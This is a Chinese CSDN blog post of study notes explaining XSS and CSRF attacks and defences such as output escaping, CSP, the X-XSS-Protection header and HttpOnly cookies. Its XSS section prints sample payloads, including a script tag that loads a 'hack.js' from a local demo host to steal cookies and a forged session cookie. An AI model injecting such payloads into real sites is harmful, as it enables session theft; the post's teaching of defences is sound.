前端安全看这篇就够了---常见Web攻击第一弹!!!

最新推荐文章于 2024-02-23 16:29:06 发布
最新推荐文章于 2024-02-23 16:29:06 发布
阅读量246 收藏 1
点赞数 1
分类专栏: 前端安全及防御 学习笔记 前端面试 文章标签: 前端 前端安全 Web攻击 跨站脚本攻击 跨站请求伪造
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44586544/article/details/107890633
版权

一、XSS

Cross Site Scripting
即我们常说的 跨站脚本攻击!!!
XSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的⼀种攻击。
跨站脚本攻击有可能造成以下影响:

1. 利用虚假输入表单骗取用户个人信息。
2. 利用脚本窃取用户的Cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求。
3. 显示伪造的文章或图片。

说完了上面的恶劣影响之后,我们再来看一下XSS攻击有哪些分类呢?
XSS攻击分类如下:

  • 反射型 - url参数直接注入
// 普通
http://localhost:3000/?from=china
// alert尝试
http://localhost:3000/?from=<script>alert(3)</script>
// 获取Cookie
http://localhost:3000/?from=<script src="http://localhost:4000/hack.js">
</script>
// 短域名伪造 https://dwz.cn/
// 伪造cookie⼊入侵 chrome
document.cookie="kaikeba:sess=eyJ1c2VybmFtZSI6Imxhb3dhbmciLCJfZXhwaXJlIjox
NTUzNTY1MDAxODYxLCJfbWF4QWdlIjo4NjQwMDAwMH0="
  • 存储型 - 存储到DB后读取时注入
// 评论
<script>alert(1)</script>
// 跨站脚本注⼊入
我来了了<script src="http://localhost:4000/hack.js"></script>

XSS攻击的危害 - Scripting能干啥就能干啥!!!

1. 获取⻚面数据
2. 获取Cookies
3. 劫持前端逻辑
4. 发送请求
5. 偷取网站的任意数据
6. 偷取用户的资料
7. 偷取用户的秘密和登录态
8. 欺骗用户

防范手段

  • ejs转义小知识:
<% code %>用于执行其中javascript代码;
<%= code %>会对code进行html转义;
<%- code %>将不会进行转义
  • HEAD
ctx.set('X-XSS-Protection', 0) // 禁⽌XSS过滤
// http://localhost:3000/?from=<script>alert(3)</script> 可以拦截 但伪装⼀下就
不⾏了

0 禁⽌XSS过滤。
1 启⽤XSS过滤(通常浏览器是默认的)。 如果检测到跨站脚本攻击,浏览器将清除⻚⾯(删除
不安全的部分)。
1;mode=block 启⽤XSS过滤。 如果检测到攻击,浏览器将不会清除⻚⾯,⽽是阻⽌⻚⾯加载。
1; report= (Chromium only)
启⽤XSS过滤。 如果检测到跨站脚本攻击,浏览器将清除⻚⾯并使⽤CSP report-uri 指令的
功能发送违规报告。
  • CSP
内容安全策略 (CSP, Content Security Policy) 是⼀个附加的安全层,⽤于帮助检测和缓解
某些类型的攻击,包括跨站脚本 (XSS) 和数据注⼊等攻击。 这些攻击可⽤于实现从数据窃
取到⽹站破坏或作为恶意软件分发版本等⽤途。
CSP 本质上就是建⽴⽩名单,开发者明确告诉浏览器哪些外部资源可以加载和执⾏。我们
只需要配置规则,如何拦截是由浏览器⾃⼰实现的。我们可以通过这种⽅式来尽量减少
XSS 攻击。
  • 转义字符
  • 黑名单
⽤户的输⼊永远不可信任的,最普遍的做法就是转义输⼊输出的内容,对于引号、尖括号、斜
杠进⾏转义
富⽂本来说,显然不能通过上⾯的办法来转义所有字符,因为这样会把需要的格式也过滤掉。
对于这种情况,通常采⽤⽩名单过滤的办法,当然也可以通过⿊名单过滤,但是考虑到需要过
滤的标签和标签属性实在太多,更加推荐使⽤⽩名单的⽅式。
  • 白名单
  • HttpOnly Cookie
这是预防XSS攻击窃取⽤户cookie最有效的防御⼿段。Web应 ⽤程序在设置cookie时,将
其属性设为HttpOnly,就可以避免该⽹⻚的cookie被客户端恶意JavaScript窃取,保护⽤
户cookie信息。

response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly")

二、CSRF

CSRF(Cross Site Request Forgery),即跨站请求伪造,是⼀种常⻅的Web攻击,它利⽤⽤户已登录的身份,在⽤户毫不知情的情况下,以⽤户的名义完成⾮法操作。

1. ⽤户已经登录了站点 A,并在本地记录了 cookie
2. 在⽤户没有登出站点 A 的情况下(也就是 cookie ⽣效的情况下),访问了恶意攻击者提供的引
诱危险站点 B (B 站点要求访问站点A)3. 站点 A 没有做任何 CSRF 防御

登录 http://localhost:4000/csrf.html

CSRF攻击危害

1. 利⽤⽤户登录态
2. ⽤户不知情
3. 完成业务请求
4. 盗取⽤户资⾦(转账,消费)
5. 冒充⽤户发帖背锅
6. 损害⽹站声誉

防御手段

1. 禁⽌第三⽅⽹站带Cookie - 有兼容性问题
2. Referer Check - Https不发送referer
3. 验证码

如果这篇文章能够帮助到您,希望您不要吝惜点赞👍👍和收藏💖💖,您的支持是我继续努力的动力 💪💪!!!

帅帅邬同学
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web 安全渗透方面的学习路线
chuange6363的博客
08-14 1239
Web安全工程师 Web安全相关概念熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。 通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google/SecWiki; 阅读《精通脚本黑客》,虽然很旧也有错误,但是入门还是可以的; 看...
Web前端设计与开发技术-课件-第10章-CSS基础完整.pptx
11-17
Web前端设计与开发技术-课件-第10章-CSS基础完整.pptx
Web-前端教程03 第一次为页面开美颜之 CSS.zip
05-24
Web-前端教程03 第一次为页面开美颜之 CSS.zip
前端开发中需要考虑的常见web安全问题和攻击原理以及防范措施
在这里,我分享我的技术心得、项目经验、实用的技术教程、深入的技术分析以及前端开发的最新动态,希望能帮助到更多的人。
02-23 1684
随着互联网的发展,Web应用程序越来越普及,但是Web安全问题也随之增加。前端开发者作为Web应用程序的构建者之一,需要了解和掌握Web安全的基本知识和解决方案。本文将介绍前端开发者必须知道的Web安全问题和防范措施。
浅谈前端安全
weixin_43675915的博客
06-10 6369
1 什么是前端安全? 2 前端目前存在哪些安全问题 2.1 xss跨站脚本攻击 xss说白了就是攻击者想尽一切的方法,将可执行的代码注入到我们的页面中,让页面进行一些非法的操作。 2.1.1 分类 xss从攻击的时间上可以分为持久型攻击和非持久型攻击。 2.1.1.1 持久型 持久型的就是指攻击者通过我们的页面,将具有攻击性的代码通过服务器保存到了数据库中,导致其他的用户在浏览当前页面时,受到了攻击。最常见的就是具有评论功能的页面。 2.1.1.2 非持久型 非持久型相比于持久型攻击危害就小的多了,一般通过
前端常见安全性问题
m0_44973790的博客
04-22 7288
文章目录 一、常见安全性问题 二、XXS攻击(Cross Site Scripting)(跨站脚本攻击) 三、CSRF安全漏洞(跨站请求伪造) 四、文件上传漏洞 五、限制URL访问,越权访问 六、不安全的加密存储 七、SQL注入 八、OS命令注入攻击 一、常见安全性问题 1、XSS(Cross-Site Scripting)脚本攻击漏洞; 2、CSRF(Cross-sit request forgery)漏洞; 3、iframe安全隐患问题; 4、本地存储数据问题; 5、第三方依赖的安全性问题; 6、H
Web安全基础教程(非常详细)从零基础入门到精通,看完这一篇就
Python_0011的博客
09-02 1412
元素定义一个段落注:在浏览器的页面上使用键盘上的F12按键开启调试模式,就可以看到组成标签。HTML-段落HTML段落是通过标签来定义的,这是一个段落HTML-链接HTML链接是通过标签来定义的标签的href属性用于指定超链接目标的URL。在href属性中指定链接的地址。HTML-图像HTML图像是通过标签来定义的HTML-水平线标签在HTML页面中创建水平线;Hr元素可用于分割内容。HTML-注释可以将注释插入HTML代码中,这样可以提高其可读性,使代码更容易被人理解。
前端必知的Web安全知识(狙击面试知识点)
bigbangbangbang1的博客
06-10 822
你真的懂Web安全吗?比如下面的几个下问题1. XSS需要转义的字符有哪些?为什么对这些字符进行转义 2. XSS攻击者可以达到哪些目的?举例的时候不要举alert('xxx')3. https加密如何验证服务端身份?https全程都是非对称通信吗? 4. 加密套件了解吗?你知道哪些加密算法? 5. 如何设计一个安全的登录系统,你会考虑哪些点如果以上问题还有困惑的地方,欢迎往下阅读,本文将用浅显易懂的语言带你快速了解Web安全
前端安全常见攻击方式及防御方法
Innocence_0的博客
01-02 1010
储存型(持久型):会把攻击者的数据储存到服务端,攻击行为将伴随攻击数据一直存在,每当用户访问该页面就会触发代码执行。很容易被盗取,如果被盗取,别人就可以冒充你的身份,打开你的保险柜,获取你的信息,动用你的资金,这是很危险的。顾名思义就是通过伪造连接请求,在用户不知情的情况下,让用户以自己的身份来完成非本意操作的攻击方法。标签,当用户浏览该页面时,恶意代码就会被执行,从而达到攻击的目的。,后端未经过滤直接存储到数据库,当正常用户浏览到他的留言后,这段。是无状态的协议,为了维持和跟踪用户的状态,引入了。
前端(十七)——Web应用的安全性研究
杜永康的博客
09-06 957
前端安全性是保护Web应用程序的前端部分免受恶意攻击和数据泄露的关键措施。前端安全性对Web应用程序至关重要。它保护用户数据、预防恶意攻击、维护业务声誉,并增强用户对应用程序的信任。开发人员应该将前端安全性纳入开发流程中,并采取适当的措施来保护应用程序和用户数据的安全用户数据保护:前端安全性确保用户输入和敏感数据得到充分保护,防止被未经授权的访问或窃取。通过有效的输入验证、数据加密和安全的身份验证机制,可以保护用户的个人信息、密码和其他敏感数据。防止跨站脚本攻击
前端安全问题及解决方案
似水流年QC的博客
06-29 1159
随着互联网的高速发展,信息安全问题已经成为行业最为关注的焦点之一。总的来说安全是很复杂的一个领域,在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,还时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。
前端常见安全问题
laihongfeng的博客
03-07 7622
一、XSS (Cross-Site Scripting)跨站脚本攻击 通常指通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,获取用户信息、控制用户浏览器等的一种攻击 分类:持久性(存储型xss) 指攻击者通过漏洞将恶意内容写在数据库中,然后当其他用户访问含有这些恶意数据的网页时,就遭受了攻击攻击位置常常在留言板,阅读列表等。 非持久性( 反射型xss) 把用户输入的数据或者url携带的数据“反射”给浏览器,往往是黑客通过诱使用户点击一个恶意链接从而达到攻击目的 非持
web前端-Web应用前端安全策略研究及应用.pdf
06-20
web前端-Web应用前端安全策略研究及应用.pdf
Web前端设计与开发技术-课件-第7章制作表单页面完整.pptx
11-14
Web前端设计与开发技术-课件-第7章制作表单页面完整.pptx
学习资料-Web前端概述.md
最新发布
04-20
学习资料-Web前端概述.md学习资料-Web前端概述.md学习资料-Web前端概述.md学习资料-Web前端概述.md学习资料-Web前端概述.md学习资料-Web前端概述.md学习资料-Web前端概述.md学习资料-Web前端概述.md学习资料-Web前端...
浅谈前端安全以及防御措施
m0_59598029的博客
02-09 562
随着互联网的高速发展,信息安全问题已经成为行业最为关注的焦点之一。今天我们就来说说一些常见攻击方法以及相应的防御措施。希望看完本文大家能对前端安全有更深一层的了解。
前端所有安全问题总结
qq_38713274的博客
04-04 2471
文章目录一、XSS 攻击防御二、CSRF 攻击防御三、iframe 风险防御四、点击劫持危害防御五、第三方依赖包带来的问题防御六、https 存在的风险过程防御七、CDN劫持防御八、本地存储数据泄露防御 一、XSS 攻击 XSS(Cross Site Scripting,跨站脚本),即攻击者往 Web 页面里嵌入恶意的客户端脚本,当用户浏览此网页时,脚本就会在用户的浏览器上执行,进而达到攻击者的目的。【获取用户的 Cookie、导航到恶意网站、携带木马】 防御 1、对输入和 URL 参数进行过滤,过滤掉会导
前端进阶】前端安全:从入门到实践
weixin_55846296的博客
06-27 1317
Web应用程序的广泛使用,使得Web安全变得越来越重要。随着Web技术的不断发展和Web应用程序的复杂性增加,越来越多的前端安全漏洞受到广泛关注。为了保护Web应用程序和用户数据,我们需要了解和掌握前端安全的知识和实践。在本文中,我们将介绍前端安全的基本概念,涉及到一些常见前端安全问题以及如何保护Web应用程序和用户数据的方法。最后,我们将深入探讨前端安全的实践方案,以帮助您实现更安全Web应用程序。在日益复杂和高风险的网络世界中,保护Web应用程序和用户数据至关重要。
年终前端安全防护规范总结
qq_53058639的博客
12-30 805
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据。
<!--kaptcha依赖-->
08-16
-- 案例2:katpcha,对应kaptcha目录案例 --> <groupId>com.github.penggle</groupId> <artifactId>kaptcha <version>2.3.2 ``` 2. 之后,你需要获取对应类型的captcha对象。在代码中,你可以使用类似以下的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值